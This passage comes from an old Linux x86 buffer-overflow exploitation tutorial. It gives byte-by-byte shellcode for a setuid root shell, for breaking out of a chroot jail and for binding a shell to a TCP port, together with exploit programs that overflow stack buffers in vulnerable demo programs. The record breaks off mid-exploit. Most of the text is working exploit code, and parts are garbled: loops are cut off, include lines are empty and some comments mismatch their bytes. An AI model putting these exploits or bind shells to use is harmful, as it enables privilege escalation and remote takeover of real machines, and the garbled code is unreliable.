	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xb0\x17"                      /* movb $0x17,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x1f"                      /* jmp 0x1f              */
	"\x5e"                          /* popl %esi             */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xd8"                      /* movl %ebx,%eax        */
	"\x40"                          /* inc %eax              */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xdc\xff\xff\xff"          /* call -0x24            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */
----------------------------------------------------------------------------

4.4 Exploit vulnerable2 program

 With this shellcode, you can make an exploit code easily.

exploit2.c
----------------------------------------------------------------------------
#include
#include

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xb0\x17"                      /* movb $0x17,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x1f"                      /* jmp 0x1f              */
	"\x5e"                          /* popl %esi             */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %eax,0x7(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xd8"                      /* movl %ebx,%eax        */
	"\x40"                          /* inc %eax              */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xdc\xff\xff\xff"          /* call -0x24            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */

unsigned long get_sp(void)
{
	__asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i;

	if(argc>1)
		offset=atoi(argv[1]);

	sp=get_sp();
	addr=sp-offset;

	for(i=0;i>8;
		buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
		buff[i+ALIGN+3]=(addr&0xff000000)>>24;
	}

	for(i=0;i
#include

int main(int argc,char **argv)
{
	char buffer[1024];
	chroot("/home/ftp");
	chdir("/");
	if(argc>1)
		strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------

 If you tries to execute "/bin/sh" with buffer overflow, it may executes
"/home/ftp/bin/sh" ( if it exists ) and you cannot access the other directories
except for "/home/ftp".

5.2 Make break chroot code
 If you can execute below code, you can break chroot.

breakchrootasm.c
----------------------------------------------------------------------------
main()
{
	mkdir("sh",0755);
	chroot("sh");
	/* many "../" */
	chroot("../../../../../../../../../../../../../../../../");
}
----------------------------------------------------------------------------

 This break chroot code makes "sh" directory, because it's easy to reference.
( it's also used to execute "/bin/sh" )

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o breakchrootasm -static breakchrootasm.c
[ ohhara@ohhara ~ ] {2} $ gdb breakchrootasm
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble mkdir
Dump of assembler code for function __mkdir:
0x804cac0 <__mkdir>:    movl   %ebx,%edx
0x804cac2 <__mkdir+2>:  movl   0x8(%esp,1),%ecx
0x804cac6 <__mkdir+6>:  movl   0x4(%esp,1),%ebx
0x804caca <__mkdir+10>: movl   $0x27,%eax
0x804cacf <__mkdir+15>: int    $0x80
0x804cad1 <__mkdir+17>: movl   %edx,%ebx
0x804cad3 <__mkdir+19>: cmpl   $0xfffff001,%eax
0x804cad8 <__mkdir+24>: jae    0x804cc40 <__syscall_error>
0x804cade <__mkdir+30>: ret    
0x804cadf <__mkdir+31>: nop    
End of assembler dump.
(gdb) disassemble chroot
Dump of assembler code for function chroot:
0x804cb60 :     movl   %ebx,%edx
0x804cb62 :   movl   0x4(%esp,1),%ebx
0x804cb66 :   movl   $0x3d,%eax
0x804cb6b :  int    $0x80
0x804cb6d :  movl   %edx,%ebx
0x804cb6f :  cmpl   $0xfffff001,%eax
0x804cb74 :  jae    0x804cc40 <__syscall_error>
0x804cb7a :  ret    
0x804cb7b :  nop    
0x804cb7c :  nop    
0x804cb7d :  nop    
0x804cb7e :  nop    
0x804cb7f :  nop    
End of assembler dump.
(gdb)
----------------------------------------------------------------------------

mkdir("sh",0755); code
----------------------------------------------------------------------------
	/* mkdir first argument is %ebx and second argument is   */
	/* %ecx.                                                 */
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb0\x17"                      /* movb $0x27,%al        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	/* %esi has to reference "/bin/sh" before using this     */
	/* instruction. This instruction load address of "sh"    */
	/* and store at %ebx                                     */
	"\xfe\xc5"                      /* incb %ch              */
	/* %cx = 0000 0001 0000 0000                             */
	"\xb0\x3d"                      /* movb $0xed,%cl        */
	/* %cx = 0000 0001 1110 1101                             */
	/* %cx = 000 111 101 101                                 */
	/* %cx = 0   7   5   5                                   */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

chroot("sh"); code
----------------------------------------------------------------------------
	/* chroot first argument is ebx */
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

chroot("../../../../../../../../../../../../../../../../"); code
----------------------------------------------------------------------------
char code[]=
	"\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
	/* disguised "../" character string                      */
	"\xf7\xdb"                      /* negl %ebx             */
	/* %ebx = $0x002f2e2e                                    */
	/* intel x86 is little endian.                           */
	/* %ebx = "../"                                          */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb1\x10"                      /* movb $0x10,%cl        */
	/* prepare for looping 16 times.                         */
	"\x56"                          /* pushl %esi            */
	/* backup current %esi. %esi has the pointer of          */
	/* "/bin/sh".                                            */
	"\x01\xce"                      /* addl %ecx,%esi        */
	"\x89\x1e"                      /* movl %ebx,(%esi)      */
	"\x83\xc6\x03"                  /* addl $0x3,%esi        */
	"\xe0\xf9"                      /* loopne -0x7           */
	/* make "../../../../ . . . " character string at        */
	/* 0x10(%esi) by looping.                                */
	"\x5e"                          /* popl %esi             */
	/* restore %esi.                                         */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
	/* %ebx has the address of "../../../../ . . . ".        */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

5.3 Modify the normal shellcode

 Making new shellcode is very easy if you make break chroot code. Just insert
the code into the start of the normal shellcode and modify jmp and call
argument.

new shellcode
----------------------------------------------------------------------------
char shellcode[]=
	"\xeb\x4f"                      /* jmp 0x4f              */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\x5e"                          /* popl %esi             */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\xb0\x27"                      /* movb $0x27,%al        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xfe\xc5"                      /* incb %ch              */
	"\xb1\xed"                      /* movb $0xed,%cl        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
	"\xf7\xdb"                      /* negl %ebx             */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb1\x10"                      /* movb $0x10,%cl        */
	"\x56"                          /* pushl %esi            */
	"\x01\xce"                      /* addl %ecx,%esi        */
	"\x89\x1e"                      /* movl %ebx,(%esi)      */
	"\x83\xc6\x03"                  /* addl %0x3,%esi        */
	"\xe0\xf9"                      /* loopne -0x7           */
	"\x5e"                          /* popl %esi             */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xac\xff\xff\xff"          /* call -0x54            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */
----------------------------------------------------------------------------

5.4 Exploit vulnerable3 program
 With this shellcode, you can make an exploit code easily.

exploit3.c
----------------------------------------------------------------------------
#include
#include

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
	"\xeb\x4f"                      /* jmp 0x4f              */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\x5e"                          /* popl %esi             */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\xb0\x27"                      /* movb $0x27,%al        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xfe\xc5"                      /* incb %ch              */
	"\xb1\xed"                      /* movb $0xed,%cl        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x8d\x5e\x05"                  /* leal 0x5(%esi),%ebx   */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xbb\xd2\xd1\xd0\xff"          /* movl $0xffd0d1d2,%ebx */
	"\xf7\xdb"                      /* negl %ebx             */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xb1\x10"                      /* movb $0x10,%cl        */
	"\x56"                          /* pushl %esi            */
	"\x01\xce"                      /* addl %ecx,%esi        */
	"\x89\x1e"                      /* movl %ebx,(%esi)      */
	"\x83\xc6\x03"                  /* addl %0x3,%esi        */
	"\xe0\xf9"                      /* loopne -0x7           */
	"\x5e"                          /* popl %esi             */
	"\xb0\x3d"                      /* movb $0x3d,%al        */
	"\x8d\x5e\x10"                  /* leal 0x10(%esi),%ebx  */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\xac\xff\xff\xff"          /* call -0x54            */
	"/bin/sh";                      /* .string \"/bin/sh\"   */

unsigned long get_sp(void)
{
	__asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
	char buff[RET_POSITION+RANGE+ALIGN+1],*ptr;
	long addr;
	unsigned long sp;
	int offset=OFFSET,bsize=RET_POSITION+RANGE+ALIGN+1;
	int i;

	if(argc>1)
		offset=atoi(argv[1]);

	sp=get_sp();
	addr=sp-offset;

	for(i=0;i>8;
		buff[i+ALIGN+2]=(addr&0x00ff0000)>>16;
		buff[i+ALIGN+3]=(addr&0xff000000)>>24;
	}

	for(i=0;i

int main(int argc,char **argv)
{
	char buffer[1024];
	if(argc>1)
		strcpy(buffer,argv[1]);
}
----------------------------------------------------------------------------

 This is standard vulnerable program. I will use this for socket opening
buffer overflow. Because I am too lazy to make a example daemon program. :)
However, after you see the code, you will not be disappointed.
 
6.2 Make open socket code
 If you can execute below code, you can open a socket.

opensocketasm1.c
----------------------------------------------------------------------------
#include
#include
#include

int soc,cli,soc_len;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;

int main()
{
	if(fork()==0)
	{
		serv_addr.sin_family=AF_INET;
		serv_addr.sin_addr.s_addr=htonl(INADDR_ANY);
		serv_addr.sin_port=htons(30464);
		soc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
		bind(soc,(struct sockaddr *)&serv_addr,sizeof(serv_addr));
		listen(soc,1);
		soc_len=sizeof(cli_addr);
		cli=accept(soc,(struct sockaddr *)&cli_addr,&soc_len);
		dup2(cli,0);
		dup2(cli,1);
		dup2(cli,2);
		execl("/bin/sh","sh",0);
	}
}
----------------------------------------------------------------------------

 It's difficult to make with assembly language. You can make this program
simple.

opensocketasm2.c
----------------------------------------------------------------------------
#include
#include
#include

int soc,cli;
struct sockaddr_in serv_addr;

int main()
{
	if(fork()==0)
	{
		serv_addr.sin_family=2;
		serv_addr.sin_addr.s_addr=0;
		serv_addr.sin_port=0x77;
		soc=socket(2,1,6);
		bind(soc,(struct sockaddr *)&serv_addr,0x10);
		listen(soc,1);
		cli=accept(soc,0,0);
		dup2(cli,0);
		dup2(cli,1);
		dup2(cli,2);
		execl("/bin/sh","sh",0);
	}
}
----------------------------------------------------------------------------

compile and disassemble
----------------------------------------------------------------------------
[ ohhara@ohhara ~ ] {1} $ gcc -o opensocketasm2 -static opensocketasm2.c
[ ohhara@ohhara ~ ] {2} $ gdb opensocketasm2
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disassemble fork
Dump of assembler code for function fork:
0x804ca90 :       movl   $0x2,%eax
0x804ca95 :     int    $0x80
0x804ca97 :     cmpl   $0xfffff001,%eax
0x804ca9c :    jae    0x804cdc0 <__syscall_error>
0x804caa2 :    ret    
0x804caa3 :    nop    
0x804caa4 :    nop    
0x804caa5 :    nop    
0x804caa6 :    nop    
0x804caa7 :    nop    
0x804caa8 :    nop    
0x804caa9 :    nop    
0x804caaa :    nop    
0x804caab :    nop    
0x804caac :    nop    
0x804caad :    nop    
0x804caae :    nop    
0x804caaf :    nop    
End of assembler dump.
(gdb) disassemble socket
Dump of assembler code for function socket:
0x804cda0 :     movl   %ebx,%edx
0x804cda2 :   movl   $0x66,%eax
0x804cda7 :   movl   $0x1,%ebx
0x804cdac :  leal   0x4(%esp,1),%ecx
0x804cdb0 :  int    $0x80
0x804cdb2 :  movl   %edx,%ebx
0x804cdb4 :  cmpl   $0xffffff83,%eax
0x804cdb7 :  jae    0x804cdc0 <__syscall_error>
0x804cdbd :  ret    
0x804cdbe :  nop    
0x804cdbf :  nop    
End of assembler dump.
(gdb) disassemble bind
Dump of assembler code for function bind:
0x804cd60 :       movl   %ebx,%edx
0x804cd62 :     movl   $0x66,%eax
0x804cd67 :     movl   $0x2,%ebx
0x804cd6c :    leal   0x4(%esp,1),%ecx
0x804cd70 :    int    $0x80
0x804cd72 :    movl   %edx,%ebx
0x804cd74 :    cmpl   $0xffffff83,%eax
0x804cd77 :    jae    0x804cdc0 <__syscall_error>
0x804cd7d :    ret    
0x804cd7e :    nop    
0x804cd7f :    nop    
End of assembler dump.
(gdb) disassemble listen
Dump of assembler code for function listen:
0x804cd80 :     movl   %ebx,%edx
0x804cd82 :   movl   $0x66,%eax
0x804cd87 :   movl   $0x4,%ebx
0x804cd8c :  leal   0x4(%esp,1),%ecx
0x804cd90 :  int    $0x80
0x804cd92 :  movl   %edx,%ebx
0x804cd94 :  cmpl   $0xffffff83,%eax
0x804cd97 :  jae    0x804cdc0 <__syscall_error>
0x804cd9d :  ret    
0x804cd9e :  nop    
0x804cd9f :  nop    
End of assembler dump.
(gdb) disassemble accept
Dump of assembler code for function __accept:
0x804cd40 <__accept>:   movl   %ebx,%edx
0x804cd42 <__accept+2>: movl   $0x66,%eax
0x804cd47 <__accept+7>: movl   $0x5,%ebx
0x804cd4c <__accept+12>:        leal   0x4(%esp,1),%ecx
0x804cd50 <__accept+16>:        int    $0x80
0x804cd52 <__accept+18>:        movl   %edx,%ebx
0x804cd54 <__accept+20>:        cmpl   $0xffffff83,%eax
0x804cd57 <__accept+23>:        jae    0x804cdc0 <__syscall_error>
0x804cd5d <__accept+29>:        ret    
0x804cd5e <__accept+30>:        nop    
0x804cd5f <__accept+31>:        nop    
End of assembler dump.
(gdb) disassemble dup2  
Dump of assembler code for function dup2:
0x804cbe0 :       movl   %ebx,%edx
0x804cbe2 :     movl   0x8(%esp,1),%ecx
0x804cbe6 :     movl   0x4(%esp,1),%ebx
0x804cbea :    movl   $0x3f,%eax
0x804cbef :    int    $0x80
0x804cbf1 :    movl   %edx,%ebx
0x804cbf3 :    cmpl   $0xfffff001,%eax
0x804cbf8 :    jae    0x804cdc0 <__syscall_error>
0x804cbfe :    ret    
0x804cbff :    nop    
End of assembler dump.
(gdb)
----------------------------------------------------------------------------

fork(); code
----------------------------------------------------------------------------
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

socket(2,1,6); code
----------------------------------------------------------------------------
	/* %ecx is a pointer of all arguments.                   */
char code[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	/* The first argument.                                   */
	/* %esi has reference free memory space before using     */
	/* this instruction.                                     */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	/* The second argument.                                  */
	"\xb0\x06"                      /* movb $0x6,%al         */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	/* The third argument.                                   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x01"                      /* movb $0x1,%bl         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

bind(soc,(struct sockaddr *)&serv_addr,0x10); code
----------------------------------------------------------------------------
	/* %ecx is a pointer of all arguments.                   */
char code[]=
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	/* %eax has to have soc value before using this          */
	/* instruction.                                          */
	/* the first argument.                                   */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
	/* serv_addr.sin_family=2                                */
	/* 2 is stored at 0xc(%esi).                             */
	"\xb0\x77"                      /* movb $0x77,%al        */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
	/* store port number at 0xe(%esi)                        */
	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
	/* %eax = the address of serv_addr                       */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	/* the second argument.                                  */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
	/* serv_addr.sin_addr.s_addr=0                           */
	/* 0 is stored at 0x10(%esi).                            */
	"\xb0\x10"                      /* movb $0x10,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	/* the third argument.                                   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x02"                      /* movb $0x2,%bl         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

listen(soc,1); code
----------------------------------------------------------------------------
	/* %ecx is a pointer of all arguments.                   */
char code[]=
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	/* %eax has to have soc value before using this          */
	/* instruction.                                          */
	/* the first argument.                                   */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	/* the second argument.                                  */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x04"                      /* movb $0x4,%bl         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

accept(soc,0,0); code
----------------------------------------------------------------------------
	/* %ecx is a pointer of all arguments.                   */
char code[]=
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\x89\xf1"                      /* movl %eax,(%esi)      */
	/* %eax has to have soc value before using this          */
	/* instruction.                                          */
	/* the first argument.                                   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	/* the second argument.                                  */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	/* the third argument.                                   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x05"                      /* movb $0x5,%bl         */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

dup2(cli,0); code
----------------------------------------------------------------------------
	/* the first argument is %ebx and the second argument    */
	/* is %ecx                                               */
char code[]=
	/* %eax has to have cli value before using this          */
	/* instruction.                                          */
	"\x88\xc3"                      /* movb %al,%bl          */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xcd\x80";                     /* int $0x80             */
----------------------------------------------------------------------------

6.3 Modify the normal shellcode

 You need some works to merge the above codes.

new shellcode
----------------------------------------------------------------------------
char shellcode[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\xcd\x80"                      /* int $0x80             */
	"\x85\xc0"                      /* testl %eax,%eax       */
	"\x75\x43"                      /* jne 0x43              */
	/* fork()!=0 case                                        */
	/* It will call exit(0)                                  */
	/* To do that, it will jump twice, because exit(0) is    */
	/* located so far.                                       */
	"\xeb\x43"                      /* jmp 0x43              */
	/* fork()==0 case                                        */
	/* It will call -0xa5                                    */
	/* To do that, it will jump twice, because call -0xa5    */
	/* is located so far.                                    */
	"\x5e"                          /* popl %esi             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x06"                      /* movb $0x6,%al         */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x01"                      /* movb $0x1,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
	"\xb0\x77"                      /* movb $0x77,%al        */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
	"\xb0\x10"                      /* movb $0x10,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x02"                      /* movb $0x2,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x04"                      /* jmp 0x4               */
	"\xeb\x55"                      /* jmp 0x55              */
	"\xeb\x5b"                      /* jmp 0x5b              */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x04"                      /* movb $0x4,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x05"                      /* movb $0x5,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x88\xc3"                      /* movb %al,%bl          */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\x31\xc9"                      /* xorl %ecx,%ecx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x01"                      /* movb $0x1,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb0\x3f"                      /* movb $0x3f,%al        */
	"\xb1\x02"                      /* movb $0x2,%cl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xb8\x2f\x62\x69\x6e"          /* movl $0x6e69622f,%eax */
	/* %eax="/bin"                                           */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb8\x2f\x73\x68\x2f"          /* movl $0x2f68732f,%eax */
	/* %eax="/sh/"                                           */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x88\x46\x07"                  /* movb %al,0x7(%esi)    */
	"\x89\x76\x08"                  /* movl %esi,0x8(%esi)   */
	"\x89\x46\x0c"                  /* movl %eax,0xc(%esi)   */
	"\xb0\x0b"                      /* movb $0xb,%al         */
	"\x89\xf3"                      /* movl %esi,%ebx        */
	"\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx   */
	"\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx   */
	"\xcd\x80"                      /* int $0x80             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\xcd\x80"                      /* int $0x80             */
	"\xe8\x5b\xff\xff\xff";         /* call -0xa5            */
----------------------------------------------------------------------------

6.4  Exploit vulnerable4 program
 With this shellcode, you can make an exploit code easily. And You have to
make code which connects to the socket.

exploit4.c
----------------------------------------------------------------------------
#include
#include
#include
#include
#include

#define ALIGN                             0
#define OFFSET                            0
#define RET_POSITION                   1024
#define RANGE                            20
#define NOP                            0x90

char shellcode[]=
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\xcd\x80"                      /* int $0x80             */
	"\x85\xc0"                      /* testl %eax,%eax       */
	"\x75\x43"                      /* jne 0x43              */
	"\xeb\x43"                      /* jmp 0x43              */
	"\x5e"                          /* popl %esi             */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x31\xdb"                      /* xorl %ebx,%ebx        */
	"\x89\xf1"                      /* movl %esi,%ecx        */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x01"                      /* movb $0x1,%al         */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\xb0\x06"                      /* movb $0x6,%al         */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x01"                      /* movb $0x1,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\x89\x06"                      /* movl %eax,(%esi)      */
	"\xb0\x02"                      /* movb $0x2,%al         */
	"\x66\x89\x46\x0c"              /* movw %ax,0xc(%esi)    */
	"\xb0\x77"                      /* movb $0x77,%al        */
	"\x66\x89\x46\x0e"              /* movw %ax,0xe(%esi)    */
	"\x8d\x46\x0c"                  /* leal 0xc(%esi),%eax   */
	"\x89\x46\x04"                  /* movl %eax,0x4(%esi)   */
	"\x31\xc0"                      /* xorl %eax,%eax        */
	"\x89\x46\x10"                  /* movl %eax,0x10(%esi)  */
	"\xb0\x10"                      /* movb $0x10,%al        */
	"\x89\x46\x08"                  /* movl %eax,0x8(%esi)   */
	"\xb0\x66"                      /* movb $0x66,%al        */
	"\xb3\x02"                      /* movb $0x2,%bl         */
	"\xcd\x80"                      /* int $0x80             */
	"\xeb\x04"                      /* jmp 0x4               */
	"\xeb\x55"                      /* jmp 0x55              */
